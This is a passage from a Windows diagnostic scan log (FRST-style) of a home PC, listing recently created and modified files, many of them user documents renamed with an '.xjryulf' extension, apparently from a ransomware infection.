2015-05-10 09:33 - 2015-05-10 09:33 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-05-08 16:06 - 2015-06-01 19:32 - 00000000 ____D () C:\Users\Giovanni\Downloads\Le fate ignoranti
2015-05-08 16:05 - 2015-06-01 19:30 - 00000000 ____D () C:\Users\Giovanni\Downloads\Million Dollar Baby (2004)
2015-05-08 16:04 - 2015-05-08 17:56 - 405450745 ____R () C:\Users\Giovanni\Downloads\Memento - [1080p, x264, ac3 ita, aac eng, subs].mkv
2015-05-06 21:24 - 2015-06-01 19:59 - 00136408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-05-06 21:24 - 2015-06-01 19:28 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-05-06 21:24 - 2015-05-06 21:24 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-05-06 21:24 - 2015-05-06 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-05-06 21:24 - 2015-05-06 21:24 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-05-06 21:24 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-05-06 21:24 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-05-06 21:24 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-05-06 21:23 - 2015-05-06 21:24 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\Giovanni\Downloads\mbam-setup-2.1.6.1022.exe
2015-05-06 20:24 - 2015-05-27 07:58 - 00002181 _____ () C:\Users\Public\Desktop\Advanced SystemCare 8.lnk
2015-05-06 20:24 - 2015-01-10 15:32 - 00128288 _____ (IObit) C:\Windows\system32\IObitSmartDefragExtension.dll
2015-05-06 20:24 - 2014-06-04 15:17 - 00034080 _____ (IObit) C:\Windows\system32\SmartDefragBootTime.exe
2015-05-06 20:23 - 2015-05-06 20:23 - 00026528 _____ (REALiX™) C:\Windows\SysWOW64\Drivers\HWiNFO64A.SYS
2015-05-06 19:05 - 2015-05-06 19:05 - 00003166 _____ () C:\Windows\System32\Tasks\Game_Booster_AutoUpdate
2015-05-06 19:01 - 2015-05-06 19:01 - 00000000 _____ () C:\autoexec.bat
2015-05-06 18:59 - 2015-05-06 18:59 - 03044736 _____ (Enigma Software Group USA, LLC.) C:\Users\Giovanni\Downloads\SpyHunter-installer.exe
2015-05-06 10:51 - 2015-05-14 12:48 - 00000020 _____ () C:\Users\Giovanni\AppData\Roaming\appdataFr3.bin
2015-05-06 10:30 - 2015-05-06 22:02 - 00000000 ____D () C:\Program Files (x86)\LibraryModule
2015-05-03 17:06 - 2015-05-03 17:06 - 00000000 ____D () C:\ProgramData\Steam
2015-05-03 17:02 - 2015-05-03 17:02 - 00002211 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2015-05-03 17:02 - 2015-05-03 17:02 - 00002205 _____ () C:\Users\Public\Desktop\WinZip.lnk
2015-05-03 17:02 - 2015-05-03 17:02 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\WinZip
2015-05-03 17:02 - 2015-05-03 17:02 - 00000000 ____D () C:\ProgramData\WinZip
2015-05-03 17:02 - 2015-05-03 17:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2015-05-03 17:01 - 2015-06-01 19:27 - 00000000 ____D () C:\Program Files\WinZip
2015-05-03 16:59 - 2015-05-03 17:00 - 120105328 _____ () C:\Users\Giovanni\Downloads\winzip190.exe
2015-05-03 16:46 - 2015-06-01 19:44 - 00000000 ____D () C:\Users\Giovanni\Downloads\Age of Empire 2 HD ITA PC
2015-05-03 16:46 - 2015-05-03 16:46 - 00018775 _____ () C:\Users\Giovanni\Downloads\Age of Empires 2 HD ITA PC (1).torrent
2015-05-03 16:45 - 2015-05-03 16:46 - 00018775 _____ () C:\Users\Giovanni\Downloads\Age of Empires 2 HD ITA PC.torrent
2015-05-03 16:19 - 2015-06-01 19:29 - 00000000 ____D () C:\Users\Giovanni\AppData\OICE_15_974FA576_32C1D314_9B8
2015-05-03 11:47 - 2015-05-03 11:47 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 02543104 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 01632768 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 01372160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 00082944 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-01 21:39 - 2014-06-16 07:22 - 00000978 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-06-01 21:16 - 2009-07-14 06:45 - 00023248 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-01 21:16 - 2009-07-14 06:45 - 00023248 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-01 20:54 - 2009-01-01 02:22 - 00001150 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-01 20:44 - 2015-04-19 18:44 - 00000000 ____D () C:\Users\Giovanni\Desktop\Foto
2015-06-01 20:43 - 2009-01-01 02:11 - 00000000 ____D () C:\Users\Giovanni
2015-06-01 20:31 - 2015-05-01 12:04 - 01321888 _____ () C:\Windows\WindowsUpdate.log
2015-06-01 19:48 - 2014-06-27 18:36 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\CrashDumps
2015-06-01 19:42 - 2015-04-19 18:39 - 00000000 ____D () C:\Users\Giovanni\Desktop\Diritto Civile II - Foto libro
2015-06-01 19:32 - 2014-11-16 18:05 - 00000000 ___RD () C:\Users\Giovanni\Dropbox
2015-06-01 19:30 - 2015-04-18 19:54 - 00000000 ____D () C:\Users\Giovanni\Downloads\House.of.Cards.2013.S03E02.WEBRip.x264-2HD[rarbg]
2015-06-01 19:30 - 2014-11-16 18:04 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Dropbox
2015-06-01 19:29 - 2014-09-27 17:34 - 00000000 ____D () C:\Users\Giovanni\AppData\OICE_15_974FA576_32C1D314_1E5
2015-06-01 19:28 - 2015-04-26 10:57 - 00000000 ____D () C:\ProgramData\deoopnakmfchinkaabfjchnemeihjjee
2015-06-01 19:28 - 2014-09-15 22:57 - 00000000 ___RD () C:\Program Files (x86)\Skype
2015-06-01 19:28 - 2014-06-16 07:23 - 00000000 ____D () C:\Program Files (x86)\iTunes
2015-06-01 19:28 - 2009-09-07 02:40 - 00000000 ____D () C:\SwSetup
2015-06-01 19:28 - 2009-01-01 12:08 - 00000000 ____D () C:\ProgramData\Recovery
2015-06-01 19:28 - 2009-01-01 03:51 - 00000000 ____D () C:\Program Files (x86)\Songr
2015-06-01 19:27 - 2010-09-03 16:03 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2015-06-01 19:26 - 2014-06-16 08:17 - 00000000 ____D () C:\Dev-Cpp
2015-06-01 19:26 - 2014-06-16 07:23 - 00000000 ____D () C:\Program Files\iPod
2015-06-01 19:17 - 2014-06-15 23:04 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\uTorrent
2015-06-01 14:29 - 2014-09-28 12:07 - 00005146 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for Giovanni-HP-Giovanni Giovanni-HP
2015-06-01 09:17 - 2014-06-16 07:29 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2015-06-01 09:08 - 2014-09-05 10:40 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Spotify
2015-06-01 09:06 - 2014-09-05 10:42 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\Spotify
2015-06-01 09:06 - 2009-01-01 02:22 - 00001146 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-06-01 09:04 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-05-30 10:19 - 2014-06-19 17:36 - 00003204 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForGiovanni
2015-05-30 10:19 - 2014-06-19 17:36 - 00000344 _____ () C:\Windows\Tasks\HPCeeScheduleForGiovanni.job
2015-05-30 09:46 - 2014-11-29 10:57 - 00000000 ____D () C:\ProgramData\ProductData
2015-05-27 13:46 - 2010-07-17 15:01 - 00019136 _____ () C:\Users\Giovanni\Documents\Spese 2013.XLSX.xjryulf
2015-05-26 12:50 - 2010-07-17 15:01 - 00187296 _____ () C:\Users\Giovanni\Downloads\Relazione reati fallimentari.DOC.xjryulf
2015-05-26 11:51 - 2015-01-31 18:44 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\Microsoft Games
2015-05-25 09:22 - 2010-07-17 15:01 - 00064672 _____ () C:\Users\Giovanni\Downloads\Diritto Penale.DOCX.xjryulf
2015-05-25 08:26 - 2015-02-20 10:50 - 92696576 _____ () C:\Windows\system32\config\SOFTWARE.iodefrag.bak
2015-05-25 08:26 - 2015-02-20 10:50 - 00319488 _____ () C:\Windows\system32\config\DEFAULT.iodefrag.bak
2015-05-25 08:26 - 2015-02-20 10:50 - 00061440 _____ () C:\Windows\system32\config\SAM.iodefrag.bak
2015-05-25 08:26 - 2015-02-20 10:50 - 00024576 _____ () C:\Windows\system32\config\SECURITY.iodefrag.bak
2015-05-24 11:01 - 2009-01-01 02:40 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\DAEMON Tools Lite
2015-05-23 17:29 - 2010-07-17 21:57 - 00741312 _____ () C:\Windows\system32\perfh010.dat
2015-05-23 17:29 - 2010-07-17 21:57 - 00147334 _____ () C:\Windows\system32\perfc010.dat
2015-05-23 17:29 - 2009-07-14 07:13 - 01659852 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-05-22 23:07 - 2015-04-04 16:59 - 00000000 ___SD () C:\Windows\SysWOW64\GWX
2015-05-22 23:07 - 2015-04-04 16:59 - 00000000 ___SD () C:\Windows\system32\GWX
2015-05-22 23:05 - 2009-01-01 03:52 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Skype
2015-05-22 19:07 - 2010-07-17 15:01 - 00011776 _____ () C:\Users\Giovanni\Desktop\Diritto del Lavoro.DOCX.xjryulf
2015-05-22 18:59 - 2010-07-17 15:01 - 00030080 _____ () C:\Users\Giovanni\Downloads\VECCHIO_Dopo_Viking_Laval_e_Ruffert1.DOC.xjryulf
2015-05-21 13:37 - 2010-07-17 15:01 - 00037168 _____ () C:\Users\Giovanni\Downloads\CorteCost2312013.DOCX.xjryulf
2015-05-19 13:10 - 2009-07-14 05:20 - 00000000 ____D () C:\Windows\rescache
2015-05-19 11:19 - 2009-07-14 06:45 - 00450240 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-05-19 11:17 - 2015-03-07 17:36 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2015-05-19 11:17 - 2015-03-07 17:36 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2015-05-19 08:37 - 2014-09-27 14:17 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2015-05-19 08:24 - 2015-03-07 17:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-05-17 21:47 - 2009-01-01 02:22 - 00004146 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-05-17 21:47 - 2009-01-01 02:22 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-05-16 12:29 - 2010-07-17 15:01 - 00099408 _____ () C:\Users\Giovanni\Desktop\Sintesi Diritto UE.DOCX.xjryulf
2015-05-12 17:52 - 2010-07-17 15:01 - 00013840 _____ () C:\Users\Giovanni\Downloads\Diritto UE libro vecchio.DOCX.xjryulf
2015-05-11 17:33 - 2010-07-17 15:01 - 00024416 _____ () C:\Users\Giovanni\Downloads\syllabus_e_patto_50102_2014-2015 (1).DOCX.xjryulf
2015-05-11 16:42 - 2010-07-17 15:01 - 00023312 _____ () C:\Users\Giovanni\Downloads\Sez._Un._2008_nuovi_parametri_di_fallibilità.DOC.xjryulf
2015-05-11 16:42 - 2010-07-17 15:01 - 00021808 _____ () C:\Users\Giovanni\Downloads\Tribunale_di_Torino_su_art._236_bis_l._fall.PDF.xjryulf
2015-05-11 12:45 - 2010-07-17 15:01 - 00106256 _____ () C:\Users\Giovanni\Downloads\Slides_Lezione_del_23_aprile_2015 (1).PPTX.xjryulf
2015-05-11 11:42 - 2010-07-17 15:01 - 03537760 _____ () C:\Users\Giovanni\Downloads\cass pen sez un 2014 38343 (1).PDF.xjryulf
2015-05-11 11:42 - 2010-07-17 15:01 - 00574016 _____ () C:\Users\Giovanni\Downloads\Cass._IV_6_dicembre_2013_n._4968 (2).PDF.xjryulf
2015-05-11 11:42 - 2010-07-17 15:01 - 00420704 _____ () C:\Users\Giovanni\Downloads\Cass._IV_10_dicembre_2008_n._4123_-_delega (2).PDF.xjryulf
2015-05-11 07:39 - 2015-02-25 08:23 - 55988224 _____ () C:\Windows\system32\config\components.iodefrag.bak
2015-05-10 16:18 - 2010-07-17 15:01 - 00106256 _____ () C:\Users\Giovanni\Downloads\Slides_Lezione_del_23_aprile_2015.PPTX.xjryulf
2015-05-10 09:27 - 2009-01-01 00:11 - 00000000 ____D () C:\Users\Giovanni\Desktop\Giovanni
2015-05-09 00:22 - 2014-06-16 12:37 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\vlc
2015-05-08 07:29 - 2014-11-16 18:05 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-05-07 15:41 - 2014-11-29 10:56 - 00000000 ____D () C:\Program Files (x86)\IObit
2015-05-06 22:11 - 2015-04-21 17:30 - 00000000 ____D () C:\ProgramData\{19cd36e7-34d1-386e-19cd-d36e734ddb9c}
2015-05-06 22:02 - 2014-11-26 12:30 - 00000000 ____D () C:\Windows\pss
2015-05-06 20:24 - 2014-11-29 17:00 - 00003196 _____ () C:\Windows\System32\Tasks\ASC8_PerformanceMonitor
2015-05-06 20:24 - 2014-11-29 16:59 - 00002884 _____ () C:\Windows\System32\Tasks\ASC8_SkipUac_Giovanni
2015-05-06 20:24 - 2014-11-29 16:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare 8
2015-05-06 20:24 - 2014-11-29 10:56 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\IObit
2015-05-06 20:23 - 2014-12-11 14:17 - 00002886 _____ () C:\Windows\System32\Tasks\Driver Booster SkipUAC (Giovanni)
2015-05-06 20:23 - 2014-11-29 10:56 - 00000000 ____D () C:\ProgramData\IObit
2015-05-06 18:59 - 2010-07-17 15:01 - 00000464 _____ () C:\Users\Giovanni\AppData\Local\Temp-log.TXT.xjryulf
2015-05-06 16:53 - 2010-07-17 15:01 - 00024416 _____ () C:\Users\Giovanni\Downloads\syllabus_e_patto_50102_2014-2015.DOCX.xjryulf
2015-05-06 10:31 - 2015-04-28 18:53 - 00000000 ____D () C:\ProgramData\bd5b7d4000076cf
2015-05-03 16:19 - 2010-07-17 15:01 - 00015104 _____ () C:\Users\Giovanni\Downloads\articolo 101 TFUE.DOC.xjryulf
2015-05-03 16:02 - 2015-03-31 15:28 - 00074770 ____H () C:\Users\Giovanni\Desktop\~WRL1452.tmp
2015-05-03 12:09 - 2009-07-14 05:20 - 00000000 ____D () C:\Windows\system32\AdvancedInstallers
2015-05-02 09:49 - 2014-12-01 11:58 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
 
==================== Files in the root of some directories =======
 
2015-05-06 10:51 - 2015-05-14 12:48 - 0000020 _____ () C:\Users\Giovanni\AppData\Roaming\appdataFr3.bin
2014-11-26 12:32 - 2014-11-27 11:20 - 0007606 _____ () C:\Users\Giovanni\AppData\Local\Resmon.ResmonCfg
2010-07-17 15:01 - 2015-05-06 18:59 - 0000464 _____ () C:\Users\Giovanni\AppData\Local\Temp-log.TXT.xjryulf
2014-09-20 12:02 - 2014-09-20 12:02 - 0000057 _____ () C:\ProgramData\Ament.ini
2015-06-01 19:29 - 2015-06-01 19:44 - 0827977 _____ () C:\ProgramData\zvcisfg.html
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-17 14:24 - 2010-07-17 14:25 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-17 14:20 - 2010-07-17 14:20 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
